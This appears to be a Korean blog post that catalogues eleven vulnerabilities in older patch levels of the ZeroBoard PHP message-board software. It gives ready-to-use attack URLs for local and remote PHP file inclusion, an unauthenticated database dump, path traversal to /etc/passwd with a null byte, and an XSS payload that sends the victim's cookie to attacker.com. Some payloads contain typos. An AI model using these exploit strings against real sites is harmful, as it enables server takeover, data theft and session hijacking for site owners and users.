336x280(권장), 300x250(권장), 250x250, 200x200 크기의 광고 코드만 넣을 수 있습니다.


[제로보드] 제로보드 취약점 정리

1. login.php 파일의 PHP Injection 취약점 / pl2 이하
login.php?group_no=1을 실행하여 취약점을 확인한 뒤,
login.php?group_no=1&file=[경로]를 호출하여 공격함

ex) login.php?group_no=1&file=test/injection.txt

<?php
 echo "해킹이 가능합니다.";
?>


2. MySQL DB 덤프 취약점 / pl3 이하
admin_setup.php?_zb_lib_included=true&exec=db_dump&member=1


3. include/write.php 파일의 원격 PHP Injection 취약점 / pl4 이하
05년 호스팅 업체 해킹의 대표적인 사례

<?php
 echo "<? echo \ "해킹이 가능합니다.\"; ?>";
?>

ex) include/write.php?dir=http://[원격 스크립트 주소]

 

4. check_user_id.php 파일의 XSS 취약점 / pl4 이하
check_user_id.php?user_id=<script>alert(document.cookie);</script>

원격지 주소로 쿠키 값을 전송하기
<script> windows.location.href = 'http://attacker.com/write.php?val=' + document:cookie; </script>

 

5. skin/nzeo_vote/error.php 파일의 원격 PHP Injection 취약점 / pl5 이하
3번과 유사


6. 웹서버의 시스템 파일 노출 취약점 / pl5 이하
_head.php?_zb_path=../../../../etc/passwd%00


7. 정규표현식을 우회한 PHP Injection 취약점 / pl5 이하
정규표현식에 Null 문자(\0) 삽입 시 그 문자까지 만을 정규표현식으로 인식하는 PHP의 특성

8. 비밀게시물을 열람할 수 있는 취약점 / pl6  이하
_member_info_included=1 의 변수를 조작하여 비밀글 열람 가능


9. .htaccess 파일업로드 취약점 / pl7 이하
.htaccess 파일이 업로드가 가능함


10. download.php 의 SQL Injection 취약점 / pl7 이하
download 회수를 paros를 통해 HTTP 헤더를 조작하여 변경할 수 있음


11. 쪽지기능의 XSS 취약점 / pl7 이하
쪽지에 XSS를 넣을경우 상대방에게 XSS가 가능함


 

+ Recent posts